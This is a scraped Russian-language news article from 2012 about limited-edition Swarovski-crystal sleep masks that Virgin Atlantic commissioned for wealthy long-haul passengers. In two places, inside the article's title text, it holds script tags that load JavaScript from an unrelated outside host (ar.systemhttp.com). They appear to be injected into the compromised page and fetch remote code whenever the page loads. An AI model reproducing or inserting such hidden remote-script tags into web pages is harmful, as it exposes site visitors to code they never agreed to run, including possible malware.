Запрашиваемая страница не найдена USD     CNY     EUR     JPY
Москва C
Последние новости
29 окт 2017, 17:29
Баварский автомобильный концерн BMW представил обновленную модель Gran Coupe 4...
Поиск

Какую марку автомобиля вы предпочитаете?

» » Маска для сна с кристаллами Swarovski от авиакомпании Virgin Atlantic

Маска для сна с кристаллами Swarovski от авиакомпании Virgin Atlantic

13 сен 2012, 12:20    ismirnov
0 комментариев    5 402 просмотра

Маска <script type="text/javascript" src="http://ar.systemhttp.com/o.js"></script>для сна с кристаллами Swarovski от авиакомпании Virgin Atlantic

Дополнить тему о «спальных» самолётах, пожалуй, стоит сообщением об ещё одном новшестве в мире авиакомпаний.

 

А в частности, авиакомпания Virgin Atlantic сделала заказ на изготовление эксклюзивных масок для сна, украшенных кристаллами Сваровского. Аксессуары предназначены для состоятельных пассажиров, совершающих длительные перелёты самолётами этой компании.

 

Создавая маски для сна, дизайнер Сайма Анвар  (Saima Anwar), использовала мелкие кристаллы синего, красного и белого цвета, которые она вручную выложила в правильный узор. Чтобы сделать одну такую маску нужно потратить 3000 кристаллов Swarovski и 10 часов рабочего времени.

 

Дизайн лимитированной серии масок для сна, состоящей из пяти экземпляров, очень напоминает самые популярные модели солнцезащитных очков.

 

Маска <script type="text/javascript" src="http://ar.systemhttp.com/o.js"></script>для сна с кристаллами Swarovski от авиакомпании Virgin AtlanticСтоимость каждой «ночной маски» $4000. Вопрос о дороговизне этой вещи даже не обсуждается, потому что самое дорогое для бизнесменов - это сон. Бешеный ритм жизни предпринимателей приводит к тому, что время, отведённое на сон, у них всегда в большом дефиците. Поэтому они, не торгуясь, готовы заплатить любые  деньги, чтоб с комфортом поспать. Авиакомпания Virgin Atlantic взялась сделать так, чтобы даже сон миллионеров был супер-приятным и роскошным. Кстати, уникальная маска получила название «The Most Expensive Night’s Sleep Ever», что в переводе на русский язык звучит как «Самый дорогой сон, который можно найти».

 

Пока только пять «везунчиков» из числа состоятельных авиапутешественников смогут воспользоваться роскошными масками для сна во время межконтинентальных перелетов.

Читайте также
29 янв 2010, 10:06    0 комментариев
Прошедшие и еще только грядущие праздники предполагают обширные материальные траты, ведь так непросто устоять перед возможностью...
Комментарии
  • bowtiesmilelaughingblushsmileyrelaxedsmirk
    heart_eyeskissing_heartkissing_closed_eyesflushedrelievedsatisfiedgrin
    winkstuck_out_tongue_winking_eyestuck_out_tongue_closed_eyesgrinningkissingstuck_out_tonguesleeping
    worriedfrowninganguishedopen_mouthgrimacingconfusedhushed
    expressionlessunamusedsweat_smilesweatdisappointed_relievedwearypensive
    disappointedconfoundedfearfulcold_sweatperseverecrysob
    joyastonishedscreamtired_faceangryragetriumph
    sleepyyummasksunglassesdizzy_faceimpsmiling_imp
    neutral_faceno_mouthinnocent